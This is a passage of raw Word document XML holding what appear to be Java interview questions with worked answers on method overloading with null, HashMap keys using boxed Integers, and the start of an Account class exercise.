        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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Object method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E1F79"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A4A7C"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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ethod</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Integer</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p>
    <w:p w14:paraId="661855AE"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9BDDDC"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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Integer method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B1F1B"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76053502"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4A73D80C" w14:textId="5CB8FF9F" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In the given code, the method(null) is called. Java will attempt to resolve the method call by checking the method signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59341AAD"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Here's the breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF04247" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>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The method(Object o) and method(Integer i) are both overloaded methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B790F" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>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null can be assigned to both Object and Integer because null is a valid value for any reference type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CFF110" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>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However, Java prefers the most specific method. Integer is a subclass of Object, so method(Integer i) is more specific than method(Object o).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5FF0FE" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD159D"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The Java compiler will choose the method(Integer i) because it is more specific than method(Object o), as Integer is a subclass of Object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762323F7"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Thus, the output of the code will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27A534"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Integer method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF9CCF" w14:textId="392EA569" w:rsidR="00AF4D54" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF4D5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lastRenderedPageBreak/>
        <w:pict w14:anchorId="70279291">
          <v:rect id="_x0000_i1888" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7420453E" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="304" w:name="_Toc196307784"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 3?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="304"/>
    </w:p>
    <w:p w14:paraId="150D482C" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018" w:rsidP="00F02018">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What is the output?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39968226"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a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p>
    <w:p w14:paraId="5E0BAE31"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01266519"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> b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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390114A6"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a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Blume"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7981F05B"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a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BlumeGlobal"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EEC660"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Map</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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D1955"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Map</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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02019E29"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Map</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131D3AED"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Map</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03696AD6" w14:textId="0287CEF1" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Let's break this down step by step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34339F" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AD52D6"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Map&lt;Integer, String&gt; aMap = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4FA58D"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Integer a = new Integer(20);      // creates a new Integer object explicitly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598EC27A"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Integer b = 20;                   // autoboxing, uses Integer.valueOf(20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C79B42"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aMap.put(a, "Blume");             // key: a (20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C241F"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aMap.put(b, "BlumeGlobal");       // key: b (also 20), this will overwrite previous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69227760" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4A8DF7"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System.out.println(aMap.get(20));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493532BE"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System.out.println(aMap.get(new Integer(20)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E88016"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System.out.println(aMap.get(b));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A869666"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System.out.println(aMap.get(a));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084488B2" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Important Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483CCCA3" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashMap uses hashCode() and equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to compare keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8356FD" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>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Integer overrides both hashCode() and equals(), so two Integer objects with the same value are considered equal for map keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD1694" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>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 xml:space="preserve">Both a and b have the value 20, so inserting b will </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the value associated with a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27481079" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Therefore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACAA3B"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aMap.put(a, "Blume");        // Key 20 -&gt; "Blume"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B5CB9"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aMap.put(b, "BlumeGlobal");  // Key 20 -&gt; "BlumeGlobal" (overwrites previous)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0DD08" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All get() calls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C3BBE" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>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aMap.get(20) → "BlumeGlobal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6CDEEF" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>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aMap.get(new Integer(20)) → "BlumeGlobal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB15ADB" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>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aMap.get(b) → "BlumeGlobal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F749D7" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>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aMap.get(a) → "BlumeGlobal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D8A57B" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67513A92"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BlumeGlobal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240D98B"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BlumeGlobal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE66F8D"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BlumeGlobal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F526E0F"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BlumeGlobal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4446E1DC" w14:textId="394739B1" w:rsidR="00AF4D54" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF4D5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E7D5589">
          <v:rect id="_x0000_i1889" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210B880" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="_Toc196307785"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 4?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>
    </w:p>
    <w:p w14:paraId="5682BA6D" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018" w:rsidP="00F02018">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Modify below code in order to print the value of a and b?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7036BCB7"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 xml:space="preserve">Account </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2B682"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40508726"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D8243"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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setData</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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="6666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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B2CCA"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D22350"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
